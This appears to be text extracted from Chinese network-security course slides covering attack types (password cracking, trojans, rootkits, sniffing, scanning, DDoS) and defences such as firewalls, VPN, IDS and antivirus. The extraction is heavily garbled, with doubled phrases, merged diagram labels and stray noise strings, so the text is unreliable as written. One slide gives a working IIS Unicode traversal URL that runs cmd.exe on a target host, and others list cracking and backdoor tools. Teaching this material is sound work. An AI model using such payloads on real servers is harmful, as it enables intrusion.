1、一、网络安全概述一、网络安全概述二、网络服务的安全问题二、网络服务的安全问题三、常见黑客攻击手段三、常见黑客攻击手段四、企业网中可以选择的安全技术四、企业网中可以选择的安全技术五、网络安全防范策略五、网络安全防范策略 一、网络安全概述Internet EmailWeb 浏览Intranet 站点电子商务电子商务 电子政务电子政务电子交易电子交易时间时间 不断增加的新应用 不断加入的网络 互联网的广泛应用 人员安全意识不足网络的攻击事件报道(网络的攻击事件报道(1 1)据联邦调查局统计,美国每年因网络安全造成的损失高达75亿美元。据美国金融时报报道,世界上平均每20秒就发生一次入侵国际互联网络的
2、计算机安全事件,三分之一的防火墙被突破。美国联邦调查局计算机犯罪组负责人吉姆 塞特尔称:给我精选10名“黑客”,组成个小组,90天内我将使美国趴下。网络的攻击事件报道(网络的攻击事件报道(2 2)在海湾战争中,美国特工人员在安曼将伊拉克从德国进口的一批计算机打印设备中换上含有可控“计算机病毒”的芯片,导致伊方的计算机系统在战争初期就陷入全面瘫痪。美国已生产出第一代采用“病毒固化”技术的芯片,并开始嵌入出口的计算机产品中。一旦需要,便可遥控激活。2000年2月,Yahoo受到攻击。“黑客”所采用的攻击方法为分布式DoS攻击。2000年3月8日:山西日报国际互联网站遭到黑客数次攻击被迫关机,这是国
3、内首例黑客攻击省级党报网站事件。2003年11月,Microsoft公司遭到来自俄罗斯的“黑客”袭击,据称造成部分源代码丢失。2003年著名的游戏公司Sierra开发的反恐精英2在未上市之前源代码被黑客从网路窃走。1980 1985 1990 1995 2001 2003时间(年)时间(年)高高各种攻击者的综合威胁各种攻击者的综合威胁程度程度低低对攻击者技术知识和技巧对攻击者技术知识和技巧的要求的要求黑客攻击越来越容易实现,威胁程度越来越高黑客攻击越来越容易实现,威胁程度越来越高信息网络系统的复杂性增加脆弱性程度网络系统日益复杂,网络系统日益复杂,安全隐患急剧增加安全隐患急剧增加网络的攻击事件
4、报道(网络的攻击事件报道(3 3)网络存在的威胁网络存在的威胁 操作系统本身的安全漏洞;防火墙存在安全缺陷和规则配置不合理;来自内部网用户的安全威胁;缺乏有效的手段监视、评估网络的安全性;TCP/IP协议族软件本身缺乏安全性;电子邮件病毒、Web页面中存在恶意的 Java/ActiveX控件;应用服务的访问控制、安全设计存在漏洞。线路窃听。指利用通信介质的电磁泄漏或搭线窃听等手段获取非 法信息。相对性 只有相对的安全,没有绝对的安全系统。操作系统与网络管理的相对性。安全性在系统的不同部件间可以转移(如在内部网络和外部网络之间使用堡垒主机)。时效性 新的漏洞与攻击方法不断发现(NT4.0已从SP
5、1发展到SP6,Windows 2000业发现很多漏洞,针对Outlook的病毒攻击非常普遍)配置相关性 日常管理中的不同配置会引入新的问题(安全测评只证 明特定环境与特定配置下的安全)新的系统部件会引入新的问题(新的设备的引入、防火墙配置的修改)攻击的不确定性 攻击发起的时间、攻击者、攻击目标和攻击发起的地点都 具有不确定性 复杂性:信息安全是一项系统工程,需要技术的和非技术的手段,涉及到安全管理、教育、培训、立法、国际合作与互不侵犯协定、应急反应等 层次一:物理环境的安全性(物理层安全)层次二:操作系统的安全性(系统层安全)层次三:网络的安全性(网络层安全)层次四:应用的安全性(应用层安全
6、)层次五:管理的安全性(管理层安全)网络设备种类繁多访问方式的多样化 网络的不断变化 用户安全专业知识的缺乏 UNIX平台上常用的邮件服务器sendmail 常以root帐号运行,存在潜在的危险;角色欺骗:电子邮件上的地址是可以假冒的;窃听:电子邮件的题头和内容是用明文传送的,所以内容在传送过程中可能被他人偷看或修改;电子邮件炸弹:被攻击的计算机被电子邮件所淹没直到系统崩溃;针对电子邮件的病毒大量涌现。多数FTP服务器可以用anonymous用户名登录,这样存在让用户破坏系统和文件可能。上载的软件可能有破坏性,大量上载的文件会耗费机时及磁盘空间。建立匿名服务器时,应当确保用户不能访问系统的重要
7、部分,尤其是包含系统配置信息的文件目录。注意不要让用户获得SHELL级的用户访问权限。普通文件传输协议(TFTP)支持无认证操作,应屏蔽掉。Telnet登录时要输入帐号和密码,但帐号和密码是以明文方式传输的,易被监听到。SSH(Secure Shell)Web浏览器和服务器难以保证安全。Web浏览器比FTP更易于传送和执行正常的程序,所以它也更易于传送和执行病毒程序。服务器端的安全问题主要来自于CGI(公共网关接口)程序,网上很多的CGI程序并不是由有经验、了解系统安全的程序员编写的,所以存在着大量的安全漏洞。JavaScript,Java Applet,Active X都会带来安全问题 Pi
8、ng、traceroute/tracert经常被用来测试网络上的计算机,以此作为攻击计算机的最初的手段。简单网络管理协议(SNMP)可以用来集中管理网络上的设备,SNMP的安全问题是别人可能控制并重新配置你的网络设备以达到危险的目的:取消数据包过滤功能、改变路径、废弃网络设备的配置文件等。NFS可以让你使用远程文件系统,不恰当的配置NFS,侵袭者可以很容易用NFS安装你的文件系统。NFS使用的是主机认证,黑客可以冒充合法的主机。日益增长的网络安全威胁状况 常见的网络攻击方式解析 口令攻击 特洛伊木马 网络监听sniffer 扫描器 病毒技术 拒绝服务攻击(DDOS)黑客和病毒技术的统一黑客和病
9、毒技术的统一自动,智能,普及自动,智能,普及,分布分布,大范围大范围 黑客文化黑客文化:从个人目的到政治,社会,军事,工业等目的从个人目的到政治,社会,军事,工业等目的 网络网络内部、外部泄密内部、外部泄密拒绝服务攻击拒绝服务攻击逻辑炸弹逻辑炸弹特洛伊木马特洛伊木马黑客攻击黑客攻击计算机病毒计算机病毒信息丢失、信息丢失、篡改、销毁篡改、销毁蠕虫蠕虫常见网络攻击方式常见网络攻击方式 口令攻击 特洛伊木马 网络监听sniffer 扫描器 病毒技术 拒绝服务攻击(DDOS)口令攻击类型 字典攻击 强行攻击 组合攻击 其他攻击类型 社会工程学 偷窥 搜索垃圾箱 口令攻击工具 Windows下常见的工具
10、下常见的工具lL0phtcrack lNTSweep lNTCrack lPWDump2lCainUnix下常见的工具下常见的工具lCracklJohn the Ripperl Slurpie 特洛伊木马 简单地说,特洛伊木马就是攻击者再次进入网络或者是系统而不被发现的隐蔽通道。在大多数情况下,攻击者入侵一个系统后,他可能还想在适当的时候再次进入系统。比如说,如果攻击者入侵了一个站点,将它作为一个对其他系统进行攻击的平台或者是跳板,他就会想在适当的时候登录到这个站点取回他以前存放在系统里面的工具进行新的攻击。很容易想到的方法就是在这个已经被入侵的系统中留一个特洛依木马。木马程序举例 QAZ Q
11、AZ是一个典型的通过电子邮件传送的特洛伊木马程序。它通常隐藏在notepad.exe程序中。木马监听代理 木马监听程序在受害者系统中打开一个端口并且对所有试图与这个端口相连接的行为进行监听。当有人通过这个端口进行连接时,它要么运行一个三方程序,要么将命令发送给攻击者。Netcat Tini Rootkit 关于Rootkit Rootkit对于UNIX系统来说是相当普遍的,NT系统的也有。和它的名字正好相反,这种工具并不能使我们获得ROOT权限,但是当一个攻击者已经获得了ROOT的身份后,它就能使攻击者在任何时候都可以以ROOT身份登录到系统。它们经常采用的方法是将自己隐藏在一些重要的文件里。
12、Rootkit有两个主要的类型:文件级别 系统级别 文件级别 Rootkit威力很强大,可以轻而易举地在系统中建立后门。最一般的情况就是它们首先进入系统然后修改系统的重要文件来达到隐藏自己的目的。合法的文件被木马程序替代。通常情况下,合法的程序变成了外壳程序,而其内部就是隐藏着的后门程序。下面列出的程序就是经常被木马程序利用掩护自己的UNIX Rootkit。LOGIN LS PS FIND WHO NETSTAT 系统级别(内核级)对于工作在文件级的Rootkit来说,它们非常容易被检测到。而内核级Rootkit工作在一个很低的级别上-内核级。它们经常依附在内核上,并没有修改系统的任何文件,
13、于是tripwire工具就不能检测到它的使用。因为它并没有对系统的任何文件进行修改,攻击者可以对系统为所欲为而不被发现。系统级Rootkit为攻击者提供了很大的便利,并且修复了文件级Rootkit的一些错误。Unix下常见的后门程序文件级Rootkit TrojanIT Lrk5 Ark Rootkit TK内核级 Knark Adore Windows下常见的后门程序 Brown Orifice Donald Dick SubSeven Back Orifice 广外女生 黑暗天使 冰河 灰鸽子 流莺 木马的清除:The Cleaner 杀毒软件 手动清除 木马的防范:不要下载和执行来历不明
14、的程序 网络监听的作用:可以截获用户口令;可以截获用户口令;可以截获秘密的或专用的信息;可以截获秘密的或专用的信息;可以用来攻击相邻的网络;可以用来攻击相邻的网络;可以对数据包进行详细的分析;可以对数据包进行详细的分析;可以分析出目标主机采用了哪些协议可以分析出目标主机采用了哪些协议工具名称操作系统功能简介SniffitSunOS,Solaris针对TCP/IP协议的不安全性进行监听TcpdumpUnix,FreeBSD可以从以太网上监听并截获数据包nfswatchHP/UX,SunOS监控在以太网上传输的NFS数据包ethermanSGI Irix监听以太网上的通信SnoopSunOS,So
15、laris用来侦听本网段数据包,常用作错误诊断NetstatUNIX、Win NT显示当前的TCP/IP连接和协议统计etherfindSunOS监听局域网上的通信的主机LanwatchDOS监听外部主机对本机的访问 定义:自动检测本地或远程主机安全弱点的程序 功能:帮助发现弱点而不是用来攻击系统 分类:本地扫描器和网络扫描器;端口扫描器和漏洞扫描器 常见扫描器:如ISS(Internet Security Scanner,Internet安全扫描程序),SATAN(Security Analysis Tool for Auditing Networks,审计网络用的安全分析工具),NESSU
16、S等可以对整个域或子网进行扫描并寻找安全上的漏洞这些程序能够针对不同系统的脆弱性确定其弱点。入侵者利用扫描收集来的信息去获得对目标系统的非法访问权。国际互联网络服务器服务器防火墙其它网络广域网电话网企业网内域网互联网扫描器互联网扫描器 DoS 攻击 LAND Teardrop,SYN flood ICMP:smurf Router:remote reset,UDP port 7,Windows:Port 135,137,139(OOB),terminal server Solaris:Linux:其他.CodeG.Mark HardyCode崩溃G.Mark HardyCodeG.Mark H
17、ardyCodeG.Mark HardyCode崩溃G.Mark Hardy第一步:攻击者向被利用网络第一步:攻击者向被利用网络A的的广播地址发送一个广播地址发送一个ICMP 协议协议的的echo请求数据报,该数据报源请求数据报,该数据报源地址被伪造成地址被伪造成10.254.8.9第二步:网络第二步:网络A上的上的所有主机都向该伪造所有主机都向该伪造的源地址返回一个的源地址返回一个echo响应,造成该响应,造成该主机服务中断。主机服务中断。以破坏系统或网络的可用性为目标 常用的工具:Trin00,TFN/TFN2K,Stacheldraht 很难防范 伪造源地址,流量加密,因此 很难跟踪cl
18、ienttargethandler.agent.DoSICMP Flood/SYN Flood/UDP FloodScanningProgram不安全的计算机不安全的计算机Hacker攻击者使用扫描工具攻击者使用扫描工具探测扫描大量主机以探测扫描大量主机以寻找潜在入侵目标。寻找潜在入侵目标。1InternetHacker被控制的计算机被控制的计算机(代理端代理端)黑客设法入侵有安全漏洞黑客设法入侵有安全漏洞的主机并获取控制权。这的主机并获取控制权。这些主机将被用于放置后门、些主机将被用于放置后门、sniffer或守护程序甚至是或守护程序甚至是客户程序。客户程序。2Internet分布式拒绝服务
19、攻击步骤(分布式拒绝服务攻击步骤(2 2)Hacker 黑客在得到入侵计算机黑客在得到入侵计算机清单后,从中选出满足建清单后,从中选出满足建立网络所需要的主机,放立网络所需要的主机,放置已编译好的守护程序,置已编译好的守护程序,并对被控制的计算机发送并对被控制的计算机发送命令。命令。3被控制计算机(代理端)被控制计算机(代理端)MasterServerInternet分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(3 3)Hacker Using Client program,黑客发送控制命令给主机,黑客发送控制命令给主机,准备启动对目标系统的攻击准备启动对目标系统的攻击4被控制计算机(代理端
20、)被控制计算机(代理端)TargetedSystemMasterServerInternet分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(4 4)InternetHacker 主机发送攻击信号给被控主机发送攻击信号给被控制计算机开始对目标系统制计算机开始对目标系统发起攻击。发起攻击。5MasterServerTargeted System被控制计算机(代理端)被控制计算机(代理端)分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(5 5)TargetedSystemHacker 目标系统被无数的目标系统被无数的伪造的请求所淹没,伪造的请求所淹没,从而无法对合法用户从而无法对合法用户进行响应,进
21、行响应,DDOS攻攻击成功。击成功。6MasterServerUserRequest DeniedInternet被控制计算机(代理端)被控制计算机(代理端)分布式拒绝服务攻击步骤(分布式拒绝服务攻击步骤(6 6)DDOS攻击的效果 由于整个过程是自动化的,攻击者能够在5秒钟内入侵一台主机并安装攻击工具。也就是说,在短短的一小时内可以入侵数千台主机。并使某一台主机可能要遭受1000MB/S数据量的猛烈攻击,这一数据量相当于1.04亿人同时拨打某公司的一部电话号码。分布式拒绝服务攻击分布式拒绝服务攻击 分布式拒绝服务攻击的今后的发展趋势:如何增强自身的隐蔽性和攻击能力;采用加密通讯通道、ICMP
22、协议等方法避开防火墙的检测;采用对自身进行数字签名等方法研究自毁机制,在被非攻击者自己使用时自行消毁拒绝服务攻击数据包,以消除证据。分布式拒绝服务攻击的发展趋势分布式拒绝服务攻击的发展趋势 预防DDOS攻击的措施 确保主机不被入侵且是安全的;确保主机不被入侵且是安全的;周期性审核系统;周期性审核系统;检查文件完整性;检查文件完整性;优化路由和网络结构;优化路由和网络结构;优化对外开放访问的主机;优化对外开放访问的主机;在网络上建立一个过滤器(在网络上建立一个过滤器(filter)或侦测器)或侦测器(sniffer),在攻击信息到达网站服务器之前阻挡攻),在攻击信息到达网站服务器之前阻挡攻击信息
23、。击信息。计算机病毒带来的危害 2003年,计算机病毒不仅导致人们支付了数十亿美元的费用,而且还动摇了互联网的中枢神经。从今年1月份的Slammer攻击事件到8月份的“冲击波”病毒,都给互联网带来了不小的破坏。2004年上半年又出现将近4000种病毒 目前世界上共有8万多种病毒,但是大部分都为“动物园”里的老病毒,这些病毒很少传播,还在“野外”的病毒有2000多种,较为流行的病毒有200多种,其中以蠕虫病毒传播最为广泛。中文IIS4.0+SP6中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,UNICODE编码 存在BUG,在UNICODE 编码中%c1%1c-(0
24、xc1-0 xc0)*0 x40+0 x1c=0 x5c=/%c0%2f-(0 xc0-0 xc0)*0 x40+0 x2f=0 x2f=NT4中/编码为%c1%9c 在英文版里:WIN2000英文版%c0%af 还有以下的编码可以实现对该漏洞的检测.%c1%pc%c0%9v%c0%qf%c1%8s http:/192.168.100.227/scripts/.%c1%1c.%c1%1cwinnt/system32/cmd.exe?/c+dir c:黑客攻击范例黑客攻击范例UNICODE漏洞的利用漏洞的利用 防火墙技术 加密技术 VPN技术 入侵检测技术 防病毒技术 网络扫描技术ServerC
25、lient注解:防火墙类似一堵城墙,将服务器与客户主机进行物理隔注解:防火墙类似一堵城墙,将服务器与客户主机进行物理隔离,并在此基础上实现服务器与客户主机之间的授权互访、互离,并在此基础上实现服务器与客户主机之间的授权互访、互通等功能。通等功能。防火墙是一个位于计算机与网络或网络与网络之间的软件或硬件设备或是软硬件结合两个安全域之间通两个安全域之间通信流的唯一通道信流的唯一通道安全域1Host A Host B 安全域2Host C Host D UDPBlockHost CHost BTCPPassHost CHost ADestinationProtocolPermitSource根据访问
26、控制规则决定根据访问控制规则决定进出网络的行为进出网络的行为防防 火火 墙墙 确保内部网向外部网的全功能互联和内部网的安全;所有内部网络与外部网的信息交流必须经过防火墙;只有按本地的安全策略被授权的信息才允许通过;防火墙本身具有防止被穿透的能力。过滤进出网络的数据包 管理进出网络的访问行为 封堵某些禁止的访问行为 记录通过防火墙的信息内容和活动 对网络攻击进行检测和告警 双主机防火墙 主机屏蔽防火墙 子网屏蔽防火墙你的网络internet双网卡主机双网卡主机1、必须使主机的路由功能无效。2、双主机防火墙是运行一组应用层代理软件或链路层 代理软件来工作的缺点:用户很容易意外地使内部路由有效你的网
27、络internet路由器路由器主机屏蔽防火墙主机屏蔽防火墙你的网络internet路由器路由器子网屏蔽防火墙子网屏蔽防火墙路由器路由器 包过滤技术 代理技术 状态检查技术 地址翻译技术 安全审计技术 安全内核技术 负载平衡技术 内容安全技术防防 火火 墙的局限墙的局限%c1%1c%c1%1cDir c:防防 火火 墙的局限墙的局限确保网络的安全确保网络的安全,就要对网络内部进行实时的就要对网络内部进行实时的检测检测 ,这就需要这就需要IDSIDS无时不在的防护!无时不在的防护!防火墙不能防止通向站点的后门。防火墙一般不提供对内部的保护。防火墙无法防范数据驱动型的攻击。防火墙不能防止用户由Int
28、ernet上下载被病毒感染的计算机程序或者将该类程序附在电子邮件上传输 加密系统的组成部分 密码分类 数字签名 近代加密技术 加密技术的实现 PGP加密软件(1)未加密的报文,也称明文。(2)加密后的报文,也称密文。(3)加密解密设备或算法。(4)加密解密的密钥密钥:是用户按照一种密码体制随机选取,它通常是一随机字符串,是控制明文和密文变换 按应用技术或历史发展阶段划分手工密码、机械密码、电子机内乱密码、计算机密码 按保密程度划分理论上保密的密码、实际上保密的密码、不保密的密码 按密钥方式划分对称密钥密码、非对称式密码 按明文形态模拟型密码、数字型密码 按编制原理划分移位、代替、置换安全性依赖
29、于:安全性依赖于:加密算法足够强,加密方法的安全性依赖于密钥的秘密性,而不是算法。特点:特点:(1)收发双方使用相同密钥 的密码(2)密钥的分发和管理非常复杂、代价昂贵。(3)不能实现数字签名用来加密大量的数据加密关键性的、核心的机密数据 加密系统的组成部分 公有密钥和私有密钥的使用规则(1)密钥成对使用)密钥成对使用(2)公钥可以给任何人,而私钥自己保留)公钥可以给任何人,而私钥自己保留(3)从现实环境下,不可能从公有密钥推导出私有)从现实环境下,不可能从公有密钥推导出私有密钥密钥 特点:(1)密钥的分配和管理简单。)密钥的分配和管理简单。(2)容易实现数字签名,最适合于电子商务应用。)容易
30、实现数字签名,最适合于电子商务应用。(3)安全性更高,计算非常复杂,实现速度远赶不)安全性更高,计算非常复杂,实现速度远赶不上对称密钥加上对称密钥加 密系统密系统 原理:将要传送的明文通过一种函数运算(HASH)转换成报文摘要,报文摘要加密后与明文一起传送给按受方,接受方将接受的明文产生新的报文摘要与发送方的发来的摘要解密比较,比较结果一致表示明文未被改动,如果不一致明文已篡改。VPN即虚拟专用网,是指一些节点通过一个公用网络(通常是因特网)建立的一个临时的、安全的连接,它们之间的通信的机密性和完整性可以通过某些安全机制的实施得到保证特征 虚拟(V):并不实际存在,而是利用现有网络,通过资源配
31、置以及虚电路的建立而构成的虚拟网络 专用(P):只有企业自己的用户才可以联入企业自己的网络 网络(N):既可以让客户连接到公网所能够到达的任何地方,也可以方便地解决保密性、安全性、可管理性等问题,降低网络的使用成本 VPN(虚拟专用网络)是通过公共介质如Internet扩展公司的网络 VPN可以加密传输的数据,保障数据的机密性、完整性、真实性 防火墙是用来保证内部网络不被侵犯,相当于银行的门卫;而VPN则是保证在网络上传输的数据不被窃取,相当于运钞车。VPN的关键技术在于通信隧道的建立,数据包通过通信隧道进行封装后的传送以确保其机密性和完整性 通常使用的方法有:使用点到点隧道协议PPTP、第二
32、层隧道协议L2TP、第二层转发协议L2F等在数据链路层对数据实行封装 使用IP安全协议IPSec在网络层实现数据封装 使用介于第二层和第三层之间的隧道协议,如MPLS隧道协议 1996年,Microsoft和Ascend等在PPP协议的基础上开发了PPTP,并将它集成于Windows NT Server4.0中,同时也提供了相应的客户端软件 PPTP可把数据包封装在PPP包中,再将整个报文封装在PPTP隧道协议包中,最后,再嵌入IP报文或帧中继或ATM中进行传输 PPTP提供流量控制,采用MPPE加密算法 1996年,Cisco提出L2F(Layer 2 Forwarding)隧道协议 199
33、7年底,Micorosoft和Cisco公司把PPTP协议和L2F协议的优点结合在一起,形成了L2TP协议 L2TP协议综合了PPTP协议和L2F(Layer 2 Forwarding)协议的优点,并且支持多路隧道,这样可以使用户同时访问Internet和企业网。L2TP可以实现和企业原有非IP网的兼容,支持MP(Multilink Protocol),可以把多个物理通道捆绑为单一逻辑信道 优点:支持其他网络协议支持其他网络协议(如(如Novell的的IPX,NetBEUI和和Apple Talk协议协议)支持流量控制支持流量控制 缺点 通道打开后,源和目的用户身份就不再进行认证,存在通道打开
34、后,源和目的用户身份就不再进行认证,存在安全隐患安全隐患 限制同时最多只能连接限制同时最多只能连接255个用户个用户 端点用户需要在连接前手工建立加密信道,另外认证和端点用户需要在连接前手工建立加密信道,另外认证和加密受到限制,没有强加密和认证支持。加密受到限制,没有强加密和认证支持。PPTP和和L2TP最适合用于远程访问虚拟专用网。最适合用于远程访问虚拟专用网。IPSec是一种由IETF设计的端到端的确保基于IP通讯的数据安全性的机制。IPSEC支持对数据加密,同时确保数据的完整性。IPSEC使用验证包头(AH,在RFC 2402中定义)提供来源验证(source authenticatio
35、n),确保数据的可靠性;IPSec使用封装安全负载(ESP,在RFC 1827 中定义)进行加密,从而确保数据机密性。在IPSec协议下,只有发送方和接受方知道秘密密钥。如果验证数据有效,接受方就可以知道数据来自真实的发送方,并且在传输过程中没有受到破坏。IPSec有两种应用模式:传送模式和隧道模式 传输模式:使用原始明文IP 头,并且只加密数据,包括它的TCP 和UDP 头。这种模式适用于小型网络和移动客户端。隧道模式:隧道模式处理整个IP 数据包:包括全部TCP/IP 或UDP/IP 头和数据,它用自己的地址做为源地址加入到新的IP 头。隧道模式被用在两端或是一端是安全网关的架构中,例如装
36、有IPSec 的防火墙。使用了隧道模式,防火墙内很多主机不需要安装IPSec 也能安全地与外界通信,并且还可以提供更多的便利来隐藏内部服务器主机和客户机的地址。优点:可提供高强度的安全性(数据加密和身份验证)对上层应用完全透明支持网络与网络、用户与用户、网络与用户多种应用模式 缺点:只支持IP协议 目前防火墙产品中集成的目前防火墙产品中集成的VPN多为使用多为使用IPSec 协议协议,在,在中国其发展处于蓬勃状态。中国其发展处于蓬勃状态。是在网络路由和交换设备上应用MPLS(Multiprotocol Label Switching)技术,简化核心路由器的路由选择方式,利用结合传统路由技术的标
37、记交换实现的IP虚拟专用网络(IP VPN)MPLS VPN 主要应用领域是用于建设全网状结构的数据专线,保证局域网互联的带宽与服务质量。总部与下面分支机构互联时,如果使用公网,则带宽、时延等很大程度上受公网的网络状况制约。而布署MPLS VPN 后,可以保证网络服务质量,从而保证一些对时延敏感的应用稳定运行,如分布异地的实时交易系统、视频会议、IP 电话等等。L2TP、PPTP:主要用于客户端接入专用网络。本身的安全性比较弱,需要依靠IPSec来提供进一步的安全性。MPLS:能够提供与传统的ATM,FR同等的安全性,但本身没有加密,认证机制,对数据的机密性等保证需要依靠IPSec来进一步保证
38、。IPSec是弥补其他VPN技术的安全性的有效保证。明文明文保证数据在传输保证数据在传输中的机密性中的机密性密文密文VPNVPN的主要作用之一的主要作用之一验证数据来源的验证数据来源的完整性和真实性完整性和真实性VPNVPN的主要作用之二的主要作用之二Internet 在网络中部署网络入侵检在网络中部署网络入侵检测系统,实时对网络中的测系统,实时对网络中的数据流进行检测,对于可数据流进行检测,对于可疑的数据,将及时报警,疑的数据,将及时报警,入侵检测系统同时与防火入侵检测系统同时与防火墙交互信息,共同防范来墙交互信息,共同防范来自于网外的攻击。自于网外的攻击。具体策略如下:具体策略如下:基于网
39、络的入侵检测策略基于网络的入侵检测策略基于主机的入侵检测策略基于主机的入侵检测策略报警报警攻击攻击IDSIDS(Intrusion Detection SystemIntrusion Detection System)就是)就是入侵检测系统,它通过抓取网络上的所有报文,入侵检测系统,它通过抓取网络上的所有报文,分析处理后,报告异常和重要的数据模式和行分析处理后,报告异常和重要的数据模式和行为模式,使网络安全管理员清楚地了解网络上为模式,使网络安全管理员清楚地了解网络上发生的事件,并能够采取行动阻止可能的破坏。发生的事件,并能够采取行动阻止可能的破坏。入侵检测系统 网络数据包的获取混杂模式 网络
40、数据包的解码协议分析 网络数据包的检查规则匹配 网络数据包的统计异常检测 网络数据包的审查事件生成监控室监控室=控制中心控制中心后门后门保安保安=防火墙防火墙摄像机摄像机=探测引擎探测引擎形象地说,它就是网络摄象机,能够捕获并记录网络上的所有数据,同时它也是智能摄象机,能够分析网络数据并提炼出可疑的、异常的网络数据,它还是X光摄象机,能够穿透一些巧妙的伪装,抓住实际的内容。它还不仅仅只是摄象机,还包括保安员的摄象机,能够对入侵行为自动地进行反击:阻断连接、关闭道路(与防火墙联动)。什么是入侵检测系统什么是入侵检测系统在安全体系中,在安全体系中,IDSIDS是唯一一个通过数据和行为模式判断是唯一
41、一个通过数据和行为模式判断其是否有效的系统,如下图所示,防火墙就象一道门,它其是否有效的系统,如下图所示,防火墙就象一道门,它可以阻止一类人群的进入,但无法阻止同一类人群中的破可以阻止一类人群的进入,但无法阻止同一类人群中的破坏分子,也不能阻止内部的破坏分子;访问控制系统可以坏分子,也不能阻止内部的破坏分子;访问控制系统可以不让低级权限的人做越权工作,但无法保证高级权限的做不让低级权限的人做越权工作,但无法保证高级权限的做破坏工作,也无法保证低级权限的人通过非法行为获得高破坏工作,也无法保证低级权限的人通过非法行为获得高级权限级权限 IDS系统的两大职责:实时检测和安全审计。实时监测实时地监视
42、、分析网络中所有的数据报文,发现并实时处理所捕获的数据报文;安全审计通过对IDS系统记录的网络事件进行统计分析,发现其中的异常现象,得出系统的安全状态,找出所需要的证据。IntranetIntranetIDS AgentIDS AgentFirewallFirewallServersDMZDMZIDS Agent监控中心监控中心router Firewall FirewallServersDMZDMZIDS AgentIntranetIntranetIDS Agent监控中心监控中心router攻击者攻击者攻击者攻击者发现攻击发现攻击发现攻击发现攻击发现攻击发现攻击报警报警报警报警 病毒概述
43、病毒危害 病毒新技术 防病毒技术 清除病毒 网络防病毒 中华人民共和国计算机信息系统安全保护条例第二十八条中明确指出:“计算机病毒计算机病毒,是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据,影响计算机使用,并能自我传染的一组计算机指令或者程序代码。”计算机病毒程序病毒引导模块(潜伏机制)病毒传染模块(再生机制)病毒表现模块(激发机制)一次非授权的加载,病毒进入内存病毒引导模块被执行修改系统参数,引人传染和表现模块监视系统运行判断传染条件是否满足?判断触发条件是否满足?进行传染进行表现或破坏 依附性 传染性 潜伏性 可触发性 破坏性 针对性 人为性 磁盘文件数目增多 系统的RAM空间
44、变小 文件的日期时间值被改变 可执行程序长度增加 磁盘上出现坏簇 程序加载时间比平时变长 程序执行时间较平时变长 硬盘读写时间明显增加 硬盘启动系统失败 病毒概述病毒概述病毒危害病毒危害病毒新技术病毒新技术防病毒技术防病毒技术消毒病毒消毒病毒网络防病毒网络防病毒 磁盘文件数目增多 影响系统效率 删除、破坏数据 干扰正常操作 阻塞网络 进行反动宣传 占用系统资源 被后门控制 CIH 病毒 Loveletter病毒 首例病毒与蠕虫相结合Sircam 首例蠕虫与黑客相结合CodeRedII Nimda病毒 隐藏型病毒 自加密、多形态及变异病毒 反向病毒 邮件型病毒 JAVA和ActiveX病毒智能化
45、 病毒形式多样化 传播方式多样化 专用病毒生成工具 蠕虫也是一种病毒,因此具有病毒的共同特征。普通病毒需要的寄生普通病毒需要的寄生,通过自己指令的执行通过自己指令的执行,将自己,将自己的指令代码写到其他程序的体内,而被的指令代码写到其他程序的体内,而被感染的文件就感染的文件就被称为被称为”宿主宿主”病毒主要是感染文件病毒主要是感染文件,当然也还有像,当然也还有像DIRII这种链接这种链接型病毒,还有引导区病毒。引导区病毒他是感染磁盘型病毒,还有引导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,这张软盘用在其他机的引导区,如果是软盘被感染,这张软盘用在其他机器上后,同样也会感染其他机
46、器,所以传播方式也是器上后,同样也会感染其他机器,所以传播方式也是用软盘等方式。用软盘等方式。病毒名称持续时间造成损失莫里斯蠕虫1988年6000多台计算机停机,直接经济损失达9600万美元 美丽杀手1999年3月政府部门和一些大公司紧急关闭了网络服务器,经济损失超过12亿美元爱虫病毒2000年5月至今 众多用户电脑被感染,损失超过100亿美元以上红色代码2001年7月网络瘫痪,直接经济损失超过26亿美元求职信2001年12月至今 大量病毒邮件堵塞服务器,损失达数百亿美元 Sql蠕虫王2003年1月网络大面积瘫痪,银行自动提款机运做中断,直接经济损失超过26亿美元 特征代码法 校验和法 行为监
47、测法 启发式扫描 虚拟机技术 采集已知病毒样本,病毒如果即感染COM文件,又感染EXE文件,要两者都采样 病毒采样中,抽取特征代码,应依据如下原则:抽取的代码比较特殊,不大可能与普通正常程序代码吻合。抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面又不要有太大的空间与时间的开 销 在既感染COM文件又感染EXE文件的病毒样本中,要抽取两种样本共有的代码 并将特征代码纳入病毒数据库 打开被检测文件,在文件中搜索,检查文件中是否含有病毒数据库中的病毒特征代码。如果发现病毒特征代码,由于特征代码与病毒一一对应,便可以断定,被查文件中患有何种病毒。优点优点:检测准确、快速可识别病毒的名称误
48、报警率低依据检测结果,可做杀毒处理 缺点:缺点:不能检测未知病毒搜集已知病毒的特征代码,费用开销大在网络上效率低。在检测病毒工具中纳入校验和法,对被查的对象文件计算其正常状态的校验和,将校验和值写入被查文件中或检测工具中,而后进行比较。在应用程序中,放入校验和法自我检查功能,将文件正常状态的 校验和写入文件本身中,每当应用程序启动时,比较现行校验和与原校验和值。实现应用程序的自检测。将校验和检查程序常驻内存,每当应用程序开始运行时,自动比 较检查应用程序内部或别的文件中预先保存的校验和。优点方法简单能发现未知病毒被查文件的细微变化也能发现。缺点必须预先记录正常态的校验和会误报警不能识别病毒名称
49、不能对付隐蔽型病毒 占有INT 13H(读写)改DOS系统为数据区的内存总量 对COM、EXE文件做写入动作 病毒程序与宿主程序的切换 修改系统Usr/bin,sbin/修改系统命令 优点:可发现未知病毒可相当准确地预报未知的多数病毒 缺点:可能误报警不能识别病毒名称实现时有一定难度 启发式是指“自我发现的能力”或“运用某种方式或方法去判定事物的知识和技能。”一个运用启发式扫描技术的病毒检测软件,实际上就是以特定方式实现的动态高度器或反编译器,通过对有关指令序列的反编译,逐步理解和确定其蕴藏的真正动机 “虚拟”二字,有着两方面的含义:可发现未知病其一在于运行一定规则的描述语言的机器并不一定是一
